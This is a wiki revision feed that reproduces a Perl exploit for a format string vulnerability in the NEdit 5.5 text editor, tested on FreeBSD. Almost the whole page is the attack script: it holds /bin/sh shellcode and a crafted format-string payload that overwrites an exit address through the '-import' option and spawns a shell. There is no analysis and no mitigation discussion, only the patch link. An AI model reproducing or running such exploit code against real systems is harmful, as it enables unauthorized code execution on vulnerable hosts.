https://pwnwiki.com/index.php?action=history&feed=atom&title=NEdit_5.5_%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%A0%BC%E5%BC%8F%E5%8C%96%E6%BC%8F%E6%B4%9E
NEdit 5.5 字符串格式化漏洞 - Revision history
2026-04-16T22:31:11Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=NEdit_5.5_%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%A0%BC%E5%BC%8F%E5%8C%96%E6%BC%8F%E6%B4%9E&diff=690&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: Format string vulnerability in Nedit <= 5.5. # Date: 04/13/2011 # Author: Tosh (The bug was already patched when I'd found the vuln) # Email: to..."
2021-03-27T02:56:48Z
<p>Created page with "==EXP== <pre> # Exploit Title: Format string vulnerability in Nedit <= 5.5. # Date: 04/13/2011 # Author: Tosh (The bug was already patched when I'd found the vuln) # Email: to..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
# Exploit Title: Format string vulnerability in Nedit <= 5.5.<br />
# Date: 04/13/2011<br />
# Author: Tosh (The bug was already patched when I'd found the vuln)<br />
# Email: tosh@tuxfamily.org<br />
# Patch:<br />
http://nedit.cvs.sourceforge.net/viewvc/nedit/nedit/source/preferences.c?r1=1.159&r2=1.160&view=patch<br />
# Version: Nedit 5.5<br />
# Tested on: FreeBSD 8.2-RELEASE<br />
# CVE: don't found<br />
<br />
<br />
#!/usr/bin/perl -w<br />
<br />
use strict;<br />
<br />
my $exit_addr = 0x0815a86c;<br />
<br />
my $sc =<br />
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50".<br />
"\x54\x53\xb0\x3b\x50\xcd\x80";<br />
<br />
my (@payload) = ("./nedit", "-import", <br />
pack('L',$exit_addr).pack('L',$exit_addr+1).pack('L',$exit_addr+2).pack('L',$exit_addr+3).<br />
<br />
"%1021\$.8x-"."%1\$127x%1021\$n%1\$083x%1022\$n%1\$212x%1023\$n%1\$256x%1024\$n"<br />
. $sc);<br />
<br />
exec(@payload);<br />
<br />
<br />
<br />
</pre></div>
Pwnwiki